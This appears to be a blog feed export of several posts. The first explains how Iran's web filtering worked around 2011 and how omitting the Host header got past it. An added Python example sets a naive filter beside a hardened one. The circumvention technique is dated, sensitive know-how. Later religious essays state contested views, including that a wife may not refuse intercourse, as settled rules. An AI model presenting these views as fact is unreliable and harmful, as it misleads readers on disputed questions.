		<category><![CDATA[Host header]]></category>
		<category><![CDATA[single-site server]]></category>
		<category><![CDATA[web server]]></category>
		<category><![CDATA[multi-site server]]></category>
		<category><![CDATA[Iran's filtering system]]></category>
		<category><![CDATA[filtering page]]></category>
		<category><![CDATA[getting past filtering]]></category>
		<category><![CDATA[how filtering operates]]></category>
		<category><![CDATA[filter process]]></category>
		<category><![CDATA[filtering process]]></category>
		<category><![CDATA[Iran filtering]]></category>
		<category><![CDATA[DNS filtering]]></category>
		<category><![CDATA[content filtering]]></category>
		<category><![CDATA[web filtering]]></category>
		<category><![CDATA[filtering stages]]></category>
		<category><![CDATA[browser]]></category>
		<category><![CDATA[how a web page loads]]></category>
		<category><![CDATA[how filtering works]]></category>
		<category><![CDATA[HTTP response]]></category>
		<category><![CDATA[redirect response]]></category>
		<category><![CDATA[page processing]]></category>
		<category><![CDATA[HTTP protocol]]></category>
		<category><![CDATA[web browser]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=614</guid>
		<description><![CDATA[Note: the weakness described in this post has been fixed by the filtering team since Dey 1390 (around January 2012); the post is kept purely for its educational and technical value. Tonight, in order to set up several kinds of proxy using different technologies, I had to look into how Iran's filtering system works, and I reached some very interesting conclusions that are worth sharing: First of all [...]]]></description>
				<content:encoded><![CDATA[<div dir="rtl">
<p style="text-align: center;"><strong>Note:</strong> the weakness described in this post has been fixed by the filtering team since Dey 1390 (around January 2012); the post is kept purely for its educational and technical value.</p>
Tonight, in order to set up several kinds of proxy using different technologies, I had to look into how Iran's filtering system works, and I reached some very interesting conclusions that are worth sharing:

First of all, filtering is only implemented on the web (that is, the HTTP and HTTPS protocols); no other protocol is filtered, whereas the blocking that the US applies to Iran because of sanctions covers every protocol. But before we go on with the filtering process, we need to know how a site gets loaded onto our computer.

<strong>How a site is loaded</strong>

As an example, suppose you type the address www.facebook.com/profile/abiusx into your web browser (Internet Explorer or Mozilla Firefox). Your browser expands it into the full address you couldn't be bothered to type:
<p style="text-align: center;">http://www.facebook.com/profile/abiusx</p>
<p style="text-align: right;">This address also carries the protocol type (the web's default) and lets the browser work out how to open it. Before doing anything else, the browser has to know which server computer on the Internet hosts www.facebook.com, that is, it needs that computer's number. This is handled by the underlying DNS protocol, which turns names into numbers.</p>
<p style="text-align: right;">An important point we will come back to is that DNS is question-and-answer by nature: your computer asks another computer on the network (usually your ISP, your Internet service provider) "what is the number for this name?" and gets a reply. Many filtering systems around the world are implemented at exactly this stage: the upstream computer answers that the address is <a title="filtering page" href="http://10.10.34.34" target="_blank">10.10.34.34</a> (the address of the computer that hosts the filtering page). This kind of filtering is easy to get around, though. You only need to point your DNS at a computer outside Iran, for example by entering 4.2.2.4 as the DNS server address in your network connection settings instead of letting it be assigned automatically. From then on your DNS questions go to that computer, and its answers are naturally the real ones rather than the filtering page.</p>
<p style="text-align: right;">Also note that a computer on the network (the Internet) usually has one number but may serve one or several sites. Small, low-traffic sites usually share a computer with several other sites; ordinary and high-traffic sites sit on a dedicated server with a single number; and famous sites are served by several different servers at once.</p>
<p style="text-align: right;">To see this for yourself, open your terminal (Command Prompt) and enter the following commands:</p>
<p style="text-align: center;">nslookup www.google.com</p>

<blockquote>
<p style="text-align: center;">The command above returns several numbers, because Google's site is served by several different servers.</p>
</blockquote>
<p style="text-align: center;">nslookup www.etebaran.ir</p>

<blockquote>
<p style="text-align: center;">The command above returns a single number, because this site sits on one server.</p>
</blockquote>
<p style="text-align: center;">nslookup www.abiusx.com</p>
<p style="text-align: center;">nslookup www.etebaran.com</p>

<blockquote>
<p style="text-align: center;">Both of the commands above return the same address, because both sites are served from the same computer.</p>
</blockquote>
<p style="text-align: right;">Once the browser has the destination computer's number, it opens a TCP network connection on port 80 (the port reserved for the web) and sends an HTTP request that says, in effect, "dear destination computer, I want such-and-such page of yours". The format of this text request looks like this:</p>

<pre dir="ltr">GET http://www.facebook.com/profile/abiusx HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=9PmTx2exnapZfHmnegR9MsiPb2C00aDc6
If-Modified-Since: Sat, 30 Jul 2011 15:21:45 GMT
Cache-Control: max-age=0</pre>
This HTTP request carries <a href="http://en.wikipedia.org/wiki/HTTP" target="_blank">specific information</a>. Some of its lines are optional, and some lines that appear in other requests are absent here. The first line states the request type (GET), its address and the protocol version (1.1). This is the most important line; for the destination server this one line is enough of a request for it to know what it should hand back to us.

The second line names the site being asked for. The web server uses it, when several sites live on the same server, to tell which of them it should serve. So if only one site lives on the server, this line has no practical effect. The line is part of the HTTP standard and must always be present.

The following lines specify the type of the requesting browser, the operating system, the languages it understands, the time and so on, so that the destination server can serve the appropriate page. These lines only matter to sophisticated web browsers.

After receiving and processing this information, the destination server finds the requested page and sends it back in the form of an HTTP response with the following format:
<pre dir="ltr">HTTP/1.1 200 OK
Date: Mon, 23 May 2005 22:38:34 GMT
Server: Apache/1.3.3.7 (Unix) (Red-Hat/Linux)
Last-Modified: Wed, 08 Jan 2003 23:11:55 GMT
Etag: "3f80f-1b6-3e1cb03b"
Accept-Ranges: bytes
Content-Length: 438
Connection: close
Content-Type: text/html; charset=UTF-8</pre>
This response shows the server's details and the response status, and it is processed by our browser. After this header, a large amount of data in HTML (the web's presentation language) usually follows; it is text, but not easily read by the human eye, while the web browser program understands it. The browser processes this data and draws it on the screen as web pages for the user to browse.

A notable point is that in the middle of processing this data the browser sometimes runs into another address (say, that of an image, a piece of audio or a script) and sends another request to the same server to fetch that piece of data too and use it in drawing the page.

<strong>How filtering is done</strong>

A good filter has to act at several stages, on both the request and the response. First, at the DNS stage it should return the appropriate answer, which of course is easily bypassed. Next, at the request stage, it must examine the first and second lines, extract the address of the destination site, and decide from that whether the site is filtered. If it is, it returns an HTTP redirect response (301 Redirect) to the filtering page's address in place of the real one.

In the third stage it must decide, based on the content of the data coming back from the destination site, whether to let it through or replace it with a redirect. This is very expensive in processing terms, since a complex program has to read and process all of the data and match the patterns of interest, yet it is the most common method in use.

In Iran, filtering is done only in the second phase (detecting the address from the header), and even that incompletely: only the Host header is inspected and its value is matched one-to-one against the filtering list. That is why, for a long time, the address ww.facebook.com could be used to reach Facebook.

<strong>A simple way past the filtering</strong>

Since only the Host header of our request is inspected, and the address can be placed in the first line of the request while Host is dropped entirely (or replaced with some irrelevant site's address), there is a very simple way to unfilter sites that have a dedicated server. Sites that share a server with other sites, however, need the Host header so that their server can tell which site was requested; this very site of mine, for example, cannot be browsed with this trick.

Before explaining how to apply it, carry out the following procedure to get more familiar with the details:
<ol>
	<li>Run your terminal (Command Prompt) and enter the following command</li>
	<li>telnet facebook.com 80</li>
	<li>This command opens a connection to the server at facebook.com on port 80 (exactly what the browser does). Once the connection is established, it prints a message saying it is ready for you to send data. Now the HTTP request has to be entered.</li>
	<li>GET /profile/abiusx HTTP/1.1</li>
	<li>Host: www.facebook.com</li>
	<li>After entering these two lines, press Enter twice. After a moment the response appears on the screen:</li>
</ol>
<pre dir="ltr">HTTP/1.1 403 Forbidden

&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1256"&gt;&lt;title&gt;LCT4-3
&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;iframe src="http://10.10.34.34?type=Invalid Site&amp;policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"&gt;&lt;/iframe&gt;&lt;/body&gt;&lt;/html&gt;</pre>
Status code 403 means access denied, and it comes with a body (in HTML) that sends your browser to a site at http://10.10.34.34; a quick read of the response text makes this clear. Now carry out the following procedure so that the response is not filtered:
<ol>
	<li>Open your terminal and enter the following command:</li>
	<li>telnet facebook.com 80</li>
	<li>Once the connection is established, enter the single request line below and press Enter twice:</li>
	<li>GET http://www.facebook.com/profile/abiusx HTTP/1.1</li>
	<li>It replies with a response like the one below, which means the page you want is at a different address (since you did not specify a browser type, Facebook assumes you are some kind of mobile phone whose page has its own address). Request that address in turn and press Enter twice:</li>
	<li>GET http://www.facebook.com/common/browser.php HTTP/1.1</li>
	<li>A fairly large amount of HTML data comes back, which is the Facebook page itself.</li>
</ol>
<pre dir="ltr">HTTP/1.1 302 Found
Location: http://www.facebook.com/common/browser.php
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.60.111
Date: Sun, 31 Jul 2011 03:05:00 GMT
Content-Length: 0</pre>
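As an added example (written for this edit, not code from the original post or from any filtering system), the following Python models the two filters discussed above: the Host-only, exact-match filter the post describes, and a hardened one that also reads an absolute-URI request line, normalizes the host and matches by domain suffix. The block list, the four raw requests and the use of the filtering-page address as redirect target are constructed for illustration; the address itself is the one the post observed.

```python
# Added example, not from the original post: the Host-only filter the post
# describes next to a hardened version. Block list and requests are constructed.
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

NAIVE_LIST = {"www.facebook.com", "facebook.com"}  # exact hostnames (constructed)
BLOCKED_DOMAINS = {"facebook.com"}                  # registered domains (constructed)
FILTER_PAGE = "http://10.10.34.34"                  # redirect target seen in the post

# Constructed raw requests: the browser's normal form, the post's bypass
# (absolute URI, no Host), the ww. typo, and an absolute URI with a decoy Host.
REQ_NORMAL = "GET /profile/abiusx HTTP/1.1\r\nHost: www.facebook.com\r\n\r\n"
REQ_NO_HOST = "GET http://www.facebook.com/profile/abiusx HTTP/1.1\r\n\r\n"
REQ_TYPO = "GET /profile/abiusx HTTP/1.1\r\nHost: ww.facebook.com\r\n\r\n"
REQ_DECOY = "GET http://www.facebook.com/ HTTP/1.1\r\nHost: example.org\r\n\r\n"


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, target, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def naive_filter(raw: str) -> Optional[str]:
    """The filter as the post describes it: the Host header value is compared
    one-to-one with the list and the request line is ignored. Returns the
    redirect target when blocked, None when the request passes."""
    _method, _target, headers = parse_request(raw)
    return FILTER_PAGE if headers.get("host") in NAIVE_LIST else None


def effective_host(target: str, headers: Dict[str, str]) -> Optional[str]:
    """Host the origin server will actually use. An absolute-URI request line
    takes precedence over the Host header (HTTP/1.1 semantics); port, case and
    a trailing dot are normalized away."""
    if target.lower().startswith(("http://", "https://")):
        host = urlsplit(target).hostname
    else:
        host = headers.get("host")
        if host:
            host = host.split(":", 1)[0]
    if not host:
        return None
    return host.lower().rstrip(".")


def hardened_filter(raw: str) -> Optional[str]:
    """Match on the effective host by domain suffix, so the registered domain,
    every subdomain, and typo'd labels such as ww.facebook.com are all covered."""
    _method, target, headers = parse_request(raw)
    host = effective_host(target, headers)
    if host is None:
        return None
    for domain in BLOCKED_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return FILTER_PAGE
    return None
```

Suffix matching on the registered domain, rather than listing every spelling of the hostname, is what closes the ww.facebook.com hole the post mentions; reading the request line closes the absolute-URI one, since that is the name the server will serve regardless of what the Host header says.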
Doing this by hand is very tedious, and the HTML output is not readable by a human either. But you can easily implement the same mechanism in any capable browser. In Firefox, for instance, install the <a title="Firefox Plugin" href="https://addons.mozilla.org/en-US/firefox/addon/modify-headers/" target="_blank">Modify Headers</a> add-on. After installing it and restarting the browser, open its settings page from the Tools menu. In the fields provided set Action to Filter and Header name to Host, then press Add. Now select the filter that was added to the list and press Enable so that the light next to it turns green.

Now visit <a href="http://abiusx.com" target="_blank">www.abiusx.com</a>. You will get a server error, because the server could not tell which of its sites you asked for. But if you visit <a href="http://www.facebook.com" target="_blank">www.facebook.com</a> you will see that there is no problem and the site opens fine. (Note, though, that some images will not load, because they are hosted on multi-site servers.)

Once you have visited the sites you wanted (which used to be filtered), you can go back to the Modify Headers settings window, select the filter and disable it again.

</div>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d9%86%d8%ad%d9%88%d9%87-%d9%81%db%8c%d9%84%d8%aa%d8%b1%db%8c%d9%86%da%af-%d8%af%d8%b1-%d8%a7%db%8c%d8%b1%d8%a7%d9%86-%d9%88-%d9%86%d9%82%d8%a7%d8%b7-%d8%b6%d8%b9%d9%81-%d8%a2%d9%86/feed/</wfw:commentRss>
		<slash:comments>83</slash:comments>
		</item>
		<item>
		<title>WB-Tree</title>
		<link>http://abiusx.com/wb-tree/</link>
		<comments>http://abiusx.com/wb-tree/#comments</comments>
		<pubDate>Wed, 22 Jun 2011 18:32:51 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[B+ Tree]]></category>
		<category><![CDATA[C++]]></category>
		<category><![CDATA[MIT]]></category>
		<category><![CDATA[Scheme]]></category>
		<category><![CDATA[SCM]]></category>
		<category><![CDATA[SLib]]></category>
		<category><![CDATA[WB]]></category>
		<category><![CDATA[WB Tree]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=607</guid>
		<description><![CDATA[Mr. Jaffer has written a clean, good, fully open-source and usable implementation of the B+ Tree that is very easy to use and has good features. He is at MIT and has implemented the SCM language, a free and standard implementation of Scheme, together with SLib. This [...]]]></description>
				<content:encoded><![CDATA[Mr. <a href="http://people.csail.mit.edu/jaffer/">Jaffer</a> has written a clean, good, fully open-source and usable implementation of the B+ Tree that is very easy to use and has good features. He is at MIT and has implemented the <a href="http://people.csail.mit.edu/jaffer/SCM">SCM</a> language, a free and standard implementation of <a href="http://en.wikipedia.org/wiki/SCM_(Scheme_implementation)">Scheme</a>, together with <a href="http://people.csail.mit.edu/jaffer/SLIB">SLib</a>.

This library, called <a href="http://people.csail.mit.edu/jaffer/WB">WB-Tree</a>, was not usable from C++; after some back-and-forth and collaboration between him and me it became usable, and I wrote a guide and a sample program for it. The guide is at the following address:
<p style="text-align: center; direction: ltr;"><a href="http://abiusx.com/code/wb/">http://abiusx.com/code/wb/</a></p>
<p style="text-align: right;">This project and guide were prepared for the Storage and Retrieval course project of <a href="http://ece.sbu.ac.ir">Shahid Beheshti University computer engineering</a> students, but it can be used with a high degree of reliability in all sorts of other projects. The guide is now also presented on the library's main site as the primary way of using it from <span dir="ltr">C++</span>. I hope it proves useful.</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/wb-tree/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>The Tension Between Divine Grace and Divine Justice</title>
		<link>http://abiusx.com/%d8%aa%d9%82%d8%a7%d8%a8%d9%84-%d9%81%d8%b6%d9%84-%d9%88-%d8%b9%d8%af%d8%a7%d9%84%d8%aa-%d8%a7%d9%84%d9%87%db%8c/</link>
		<comments>http://abiusx.com/%d8%aa%d9%82%d8%a7%d8%a8%d9%84-%d9%81%d8%b6%d9%84-%d9%88-%d8%b9%d8%af%d8%a7%d9%84%d8%aa-%d8%a7%d9%84%d9%87%db%8c/#comments</comments>
		<pubDate>Thu, 02 Jun 2011 07:30:27 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
		<category><![CDATA[Analytical]]></category>
		<category><![CDATA[Science]]></category>
		<category><![CDATA[Religious]]></category>
		<category><![CDATA[fairness]]></category>
		<category><![CDATA[injustice]]></category>
		<category><![CDATA[wisdom]]></category>
		<category><![CDATA[mercy]]></category>
		<category><![CDATA[just]]></category>
		<category><![CDATA[justice]]></category>
		<category><![CDATA[grace]]></category>
		<category><![CDATA[divine grace]]></category>
		<category><![CDATA[equality]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=597</guid>
		<description><![CDATA[One of the issues that can occupy the mind regarding divine justice is the matter of God's grace. Note that justice is an intrinsically desirable attribute, so we do not say justice is good because God is just; rather, justice is good in itself. Determining the concrete instances of justice is of course not easy, but in some generalities it is possible. God's grace, which arises [...]]]></description>
				<content:encoded><![CDATA[One of the issues that can occupy the mind regarding divine justice is the matter of God's grace. Note that justice is an intrinsically desirable attribute, so we do not say justice is good because God is just; rather, justice is good in itself. Determining the concrete instances of justice is of course not easy, but in some generalities it is possible.

God's grace, which arises from God's mercy, means that God gives to whomever He wills beyond any reckoning. Perhaps the clearest instance of God's grace is the Infallibles and the saints, to whom God has granted from where they could not have reckoned. The question may arise: how is the infallibility of the Infallibles, and the impossibility of the likes of us being infallible (or an imam or a prophet), compatible with divine justice? Questions of this kind all relate to God's grace, that is, to where God gives to someone without reckoning. Is giving without reckoning even just?

The problem is that, in judging instances of justice, we have always thought of worldly and material cases and measured by the model of this world. In this world, if a ruler gives someone extra from the public treasury (out of his own grace), it is not just, because it leaves the others with a smaller share. Even if a teacher gives one student a higher grade, although on the face of it nobody else's right has been reduced, in practice it is not just, since grades and averages affect the opportunities allocated later: the others have been pushed down and their future rights diminished. So the world is limited, and any worldly grace is doomed to injustice.

But God is not like this; He bestows His grace from the infinite. If God grants someone the good of this world and the next, even without reckoning, nothing is taken from anyone else and no harm to them is conceivable. Hence the All-Wise God states that We give whomever We will whatever We will, and the great scholars too consider this consistent with God's justice, even though the human self may at first refuse to accept it.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d8%aa%d9%82%d8%a7%d8%a8%d9%84-%d9%81%d8%b6%d9%84-%d9%88-%d8%b9%d8%af%d8%a7%d9%84%d8%aa-%d8%a7%d9%84%d9%87%db%8c/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Happiness and Sadness</title>
		<link>http://abiusx.com/%d8%ae%d9%88%d8%b4%d8%ad%d8%a7%d9%84%db%8c-%d9%88-%d9%86%d8%a7%d8%b1%d8%a7%d8%ad%d8%aa%db%8c/</link>
		<comments>http://abiusx.com/%d8%ae%d9%88%d8%b4%d8%ad%d8%a7%d9%84%db%8c-%d9%88-%d9%86%d8%a7%d8%b1%d8%a7%d8%ad%d8%aa%db%8c/#comments</comments>
		<pubDate>Wed, 11 May 2011 11:10:06 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
		<category><![CDATA[Critical]]></category>
		<category><![CDATA[Analytical]]></category>
		<category><![CDATA[Religious]]></category>
		<category><![CDATA[Mood]]></category>
		<category><![CDATA[feeling]]></category>
		<category><![CDATA[bad and wrong]]></category>
		<category><![CDATA[decision-making]]></category>
		<category><![CDATA[sense]]></category>
		<category><![CDATA[bitter memory]]></category>
		<category><![CDATA[pleasant memory]]></category>
		<category><![CDATA[good and right]]></category>
		<category><![CDATA[mind]]></category>
		<category><![CDATA[innate nature]]></category>
		<category><![CDATA[animal nature]]></category>
		<category><![CDATA[judgment]]></category>
		<category><![CDATA[mood]]></category>
		<category><![CDATA[subconscious]]></category>
		<category><![CDATA[nafs (self)]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=520</guid>
		<description><![CDATA[The draft of what I'm writing dates from 16 Azar 1389 (7 December 2010). But I think that among the drafts I have it is now the most important one; I hope that reading it lights up a dark corner of our minds and hearts. One of the things we wrestle with a great deal in life is happiness and sadness, or more generally our mood. Nobody [...]]]></description>
				<content:encoded><![CDATA[The draft of what I'm writing dates from 16 Azar 1389 (7 December 2010). But I think that among the drafts I have it is now the most important one; I hope that reading it lights up a dark corner of our minds and hearts.

One of the things we wrestle with a great deal in life is happiness and sadness, or more generally our mood. Nobody can claim that human life is not made up of happiness and sadness, or that some person has been permanently happy or permanently sad. My aim in this piece is not to model sadness and happiness; rather, I want to address the effects these two "feelings" have on human life.

If we feel happy after doing something and are pleased at having done it, the act leaves an impression on our mind and we recall it as a pleasant memory. Conversely, if some act (whether ours or someone else's) upsets us, we try not to think about it much and, in our subconscious, we come to regard it as inappropriate.

In the long run these subconscious thoughts lead us to conclude that whatever makes us happy is a good and "right" act and whatever upsets us is a bad and "wrong" act, to the point where happiness and sadness become the main axis of our decisions and of the course we set for our lives, just as the misguided culture of liberalism holds that one should live so as to be happy, and that at any moment only the answer to the question "Are you happy doing this?" can help us decide.

But is that really so? Certainly not; it stems from our self (nafs) and our animal nature, just as animals act on this very feeling and care nothing for benefit, expedience and the like. To make it more tangible that it is not so, a few examples:
<ul>
	<li>Enjoining good and forbidding evil, which is an obligatory and important act, usually upsets the person addressed (and it is precisely through that discomfort that it has its effect)</li>
	<li>Narcotics and alcoholic drinks can easily multiply a person's happiness and joy, but is consuming them the right thing to do? (And this is why the consumption of such things is very, very high in liberal cultures)</li>
	<li>Successful and influential people have always been hard-working and have endured hardship. The lives of such people have usually not been smooth, and a large part of them has consisted of great sorrows. Conversely, shallow and inconsequential people have usually had easy and pleasant lives.</li>
</ul>
So one must bear in mind that deciding and judging whether acts are right or wrong should not be done by human feeling, let alone the subconscious feeling of happiness and sadness, and the person who can minimize the influence of these feelings on the decisions they make will be the more successful one.

Now, how much do we really decide and act on the basis of these two feelings?]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d8%ae%d9%88%d8%b4%d8%ad%d8%a7%d9%84%db%8c-%d9%88-%d9%86%d8%a7%d8%b1%d8%a7%d8%ad%d8%aa%db%8c/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>The Duties of Husband and Wife in Married Life</title>
		<link>http://abiusx.com/%d9%88%d8%b8%d8%a7%db%8c%d9%81-%d8%b2%d9%86-%d9%88-%d9%85%d8%b1%d8%af-%d8%af%d8%b1-%d8%b2%d9%86%d8%af%da%af%db%8c-%d8%b2%d9%86%d8%a7%d8%b4%d9%88%db%8c%db%8c/</link>
		<comments>http://abiusx.com/%d9%88%d8%b8%d8%a7%db%8c%d9%81-%d8%b2%d9%86-%d9%88-%d9%85%d8%b1%d8%af-%d8%af%d8%b1-%d8%b2%d9%86%d8%af%da%af%db%8c-%d8%b2%d9%86%d8%a7%d8%b4%d9%88%db%8c%db%8c/#comments</comments>
		<pubDate>Fri, 06 May 2011 14:26:59 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Critical]]></category>
		<category><![CDATA[Analytical]]></category>
		<category><![CDATA[Religious]]></category>
		<category><![CDATA[Marriage]]></category>
		<category><![CDATA[Islamic marriage]]></category>
		<category><![CDATA[Raising children]]></category>
		<category><![CDATA[Tamkin (marital submission)]]></category>
		<category><![CDATA[Family]]></category>
		<category><![CDATA[Islamic family]]></category>
		<category><![CDATA[Western family]]></category>
		<category><![CDATA[Running the household]]></category>
		<category><![CDATA[Woman]]></category>
		<category><![CDATA[Marital life]]></category>
		<category><![CDATA[Life]]></category>
		<category><![CDATA[Affection]]></category>
		<category><![CDATA[Religiously valid excuse]]></category>
		<category><![CDATA[Law]]></category>
		<category><![CDATA[Man]]></category>
		<category><![CDATA[Nafaqah (maintenance)]]></category>
		<category><![CDATA[Intercourse]]></category>
		<category><![CDATA[Duties]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=589</guid>
		<description><![CDATA[A while ago I heard something on this subject and did some investigating, and then when I went to the internet and the so-called clerical websites looking for the duties of husband and wife in married life, I found nothing but stories, advice and personal opinions. Everyone had gone to the trouble of listing a handful of hadiths [...]]]></description>
				<content:encoded><![CDATA[A while ago I heard something on this subject and did some investigating, and then when I went to the internet and the so-called clerical websites looking for the duties of husband and wife in married life, I found nothing but stories, advice and personal opinions. Everyone had gone to the trouble of listing a handful of hadiths whose authenticity was unclear, had drawn from them a series of conclusions even more dubious than the hadiths, and had woven a whole scroll of duties.

So I decided to write up this discussion, which is also very short, precisely and definitively, as befits the Adliyyah (Shia) school and unlike the haphazard, imprecise, off-the-cuff writings that cause doubt, hesitation and division, because I feel that for anyone who wants an Islamic marriage knowing this is extremely important, and I see people who have gone off the rails for not knowing it.

<strong>The husband's definite duties toward the wife in married life:</strong>
<ol>
	<li>Nafaqah (maintenance), comprising food, clothing and housing, at the level of the wife's standing: note that if, for example, a man marries a woman from a wealthy family, he must provide maintenance at the standing of that woman and that family, and this is his duty (if he cannot, he has failed in it). Maintenance is spent by the husband on the wife and is counted as the wife's property.</li>
	<li>Care and upbringing of the children: do not be surprised, this too is the husband's duty even though wives usually do it. It is because of this duty that custody of the child belongs to the husband.</li>
	<li>Keeping and running the household: yes, this too is the husband's duty. This is why the wife may demand payment for any work she does in the home, or may decline to do it.</li>
	<li>Partial tamkin: the husband is obliged to set aside some of his nights for his wife and be with her. The husband is also obliged, within each period (customarily about a few months), not to withhold himself from his wife at least once.</li>
</ol>
<strong>The wife's definite duties toward the husband in married life:</strong>
<ol>
	<li>Tamkin: the wife's only duty toward the husband in married life is tamkin. In juristic terminology, tamkin means that whenever the husband asks the wife for intercourse, she must not refuse (unless she has a definite excuse).</li>
</ol>
&nbsp;

Note that from Islam's point of view the duties of husband and wife in married life are only those stated above, but since married life rests on affection and love and not on law (unlike the rule-bound, rigid Western family), usually women, who are more affectionate, sacrifice far more. Let us not forget that over history this sacrifice has turned into a custom that has so altered the wife's duties that our collective picture of married life and of the duties of husband and wife, and consequently the laws of the marital domain, has shifted.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d9%88%d8%b8%d8%a7%db%8c%d9%81-%d8%b2%d9%86-%d9%88-%d9%85%d8%b1%d8%af-%d8%af%d8%b1-%d8%b2%d9%86%d8%af%da%af%db%8c-%d8%b2%d9%86%d8%a7%d8%b4%d9%88%db%8c%db%8c/feed/</wfw:commentRss>
		<slash:comments>121</slash:comments>
		</item>
		<item>
		<title>Mut'ah from the Perspective of the Quran</title>
		<link>http://abiusx.com/%d9%85%d8%aa%d8%b9%d9%87-%d8%a7%d8%b2-%d8%af%db%8c%d8%af%da%af%d8%a7%d9%87-%d9%82%d8%b1%d8%a2%d9%86/</link>
		<comments>http://abiusx.com/%d9%85%d8%aa%d8%b9%d9%87-%d8%a7%d8%b2-%d8%af%db%8c%d8%af%da%af%d8%a7%d9%87-%d9%82%d8%b1%d8%a2%d9%86/#comments</comments>
		<pubDate>Thu, 21 Apr 2011 21:50:47 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Temporary marriage]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[Quran]]></category>
		<category><![CDATA[Mut'ah]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=583</guid>
		<description><![CDATA[I did a compact piece of research on proving that mut'ah is permissible and halal, as a starting point. Once its permissibility is established, its features and conditions can be addressed better. If friends wish, please share the piece so that others can use it too. Thanks http://abiusx.com/archive/html/mut&#8217;a.html]]></description>
				<content:encoded><![CDATA[I did a compact piece of research on proving that mut'ah is permissible and halal, as a starting point. Once its permissibility is established, its features and conditions can be addressed better. If friends wish, please share the piece so that others can use it too. Thanks
<p style="text-align: center;"><a title="mut'a in Quran" href="http://abiusx.com/archive/html/mut'a.html">http://abiusx.com/archive/html/mut&#8217;a.html</a></p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d9%85%d8%aa%d8%b9%d9%87-%d8%a7%d8%b2-%d8%af%db%8c%d8%af%da%af%d8%a7%d9%87-%d9%82%d8%b1%d8%a2%d9%86/feed/</wfw:commentRss>
		<slash:comments>31</slash:comments>
		</item>
		<item>
		<title>Knowledge / Reasoning</title>
		<link>http://abiusx.com/%d9%85%d8%b9%d8%b1%d9%81%d8%aa-%d8%a7%d8%b3%d8%aa%d8%af%d9%84%d8%a7%d9%84/</link>
		<comments>http://abiusx.com/%d9%85%d8%b9%d8%b1%d9%81%d8%aa-%d8%a7%d8%b3%d8%aa%d8%af%d9%84%d8%a7%d9%84/#comments</comments>
		<pubDate>Thu, 07 Apr 2011 21:14:26 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Analytical]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[Deduction]]></category>
		<category><![CDATA[Epistemology]]></category>
		<category><![CDATA[Induction]]></category>
		<category><![CDATA[Inference]]></category>
		<category><![CDATA[Positivism]]></category>
		<category><![CDATA[Experiment]]></category>
		<category><![CDATA[Reasoning]]></category>
		<category><![CDATA[Deductive reasoning]]></category>
		<category><![CDATA[Induction (istiqra)]]></category>
		<category><![CDATA[Inference (istintaj)]]></category>
		<category><![CDATA[Islam and science]]></category>
		<category><![CDATA[Types of reasoning]]></category>
		<category><![CDATA[Epistemology (transliterated)]]></category>
		<category><![CDATA[Experience]]></category>
		<category><![CDATA[Golden age]]></category>
		<category><![CDATA[Shia]]></category>
		<category><![CDATA[Adliyyah]]></category>
		<category><![CDATA[Reason]]></category>
		<category><![CDATA[Knowledge]]></category>
		<category><![CDATA[Syllogism (qiyas)]]></category>
		<category><![CDATA[Theory of knowledge]]></category>
		<category><![CDATA[Logic]]></category>
		<category><![CDATA[Positivism (transliterated)]]></category>
		<category><![CDATA[Kasr (deduction)]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=572</guid>
		<description><![CDATA[Knowledge (which in this post refers to ma'rifat and cognition) is acquired in several ways; of these we will deal only with acquired knowledge and will not examine knowledge obtained in other ways (such as revelation and the like). Types of reasoning Knowledge in general is obtained through reasoning, so theories that [...]]]></description>
				<content:encoded><![CDATA[Knowledge (which in this post refers to ma'rifat and cognition) is acquired in several ways; of these we will deal only with acquired knowledge ('ilm husuli) and will not examine knowledge obtained in other ways (such as revelation and the like).

<strong>Types of reasoning</strong>

Knowledge in general is obtained through reasoning, so we do not call theories that arise from imagination (wahm) knowledge. (A major part of human creativity draws on the faculty of imagination.) Reasoning in turn is divided into the three classes below:
<ul>
